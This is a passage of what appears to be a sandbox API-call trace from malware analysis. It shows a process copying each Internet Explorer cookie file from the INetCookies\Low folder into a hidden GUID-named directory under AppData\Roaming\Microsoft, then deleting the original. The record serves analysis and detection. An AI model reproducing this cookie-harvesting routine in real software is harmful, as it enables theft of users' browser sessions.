lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.032] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.032] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.032] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.032] StrChrW (lpStart="Low\\5STJ6NZL.txt", wMatch=0x74c005c) returned="\\5STJ6NZL.txt" [0252.032] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.032] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.033] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.033] StrChrW (lpStart="5STJ6NZL.txt", wMatch=0x74c005c) returned 0x0 [0252.033] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="5STJ6NZL.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5STJ6NZL.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5STJ6NZL.txt" [0252.033] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5STJ6NZL.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5stj6nzl.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5STJ6NZL.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\5stj6nzl.txt"), bFailIfExists=0) returned 1 [0252.052] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5STJ6NZL.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5stj6nzl.txt")) returned 1 [0252.053] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.053] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.053] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.053] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.053] StrChrW (lpStart="Low\\5TAY54V0.txt", wMatch=0x74c005c) returned="\\5TAY54V0.txt" [0252.053] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.053] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.053] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.053] StrChrW (lpStart="5TAY54V0.txt", wMatch=0x74c005c) returned 0x0 [0252.053] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="5TAY54V0.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5TAY54V0.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5TAY54V0.txt" [0252.053] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5TAY54V0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5tay54v0.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5TAY54V0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\5tay54v0.txt"), bFailIfExists=0) returned 1 [0252.059] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5TAY54V0.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5tay54v0.txt")) returned 1 [0252.060] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.060] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.060] StrChrW (lpStart="Low\\5WQEGNKI.txt", wMatch=0x74c005c) returned="\\5WQEGNKI.txt" [0252.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.060] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.060] StrChrW (lpStart="5WQEGNKI.txt", wMatch=0x74c005c) returned 0x0 [0252.060] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="5WQEGNKI.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5WQEGNKI.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5WQEGNKI.txt" [0252.060] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5WQEGNKI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5wqegnki.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\5WQEGNKI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\5wqegnki.txt"), bFailIfExists=0) returned 1 [0252.066] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\5WQEGNKI.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\5wqegnki.txt")) returned 1 [0252.067] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.067] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.067] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.068] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.068] StrChrW (lpStart="Low\\66I0OJL8.txt", wMatch=0x74c005c) returned="\\66I0OJL8.txt" [0252.068] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.068] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.068] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.068] StrChrW (lpStart="66I0OJL8.txt", wMatch=0x74c005c) returned 0x0 [0252.068] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="66I0OJL8.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\66I0OJL8.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\66I0OJL8.txt" [0252.068] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\66I0OJL8.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\66i0ojl8.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\66I0OJL8.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\66i0ojl8.txt"), bFailIfExists=0) returned 1 [0252.073] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\66I0OJL8.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\66i0ojl8.txt")) returned 1 [0252.075] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.075] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.075] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.075] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.075] StrChrW (lpStart="Low\\80J4IH0Y.txt", wMatch=0x74c005c) returned="\\80J4IH0Y.txt" [0252.075] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.075] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.075] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.075] StrChrW (lpStart="80J4IH0Y.txt", wMatch=0x74c005c) returned 0x0 [0252.075] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="80J4IH0Y.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\80J4IH0Y.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\80J4IH0Y.txt" [0252.075] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\80J4IH0Y.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\80j4ih0y.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\80J4IH0Y.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\80j4ih0y.txt"), bFailIfExists=0) returned 1 [0252.080] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\80J4IH0Y.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\80j4ih0y.txt")) returned 1 [0252.081] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.081] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.081] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.081] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.081] StrChrW (lpStart="Low\\8FFCGS26.txt", wMatch=0x74c005c) returned="\\8FFCGS26.txt" [0252.081] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.081] 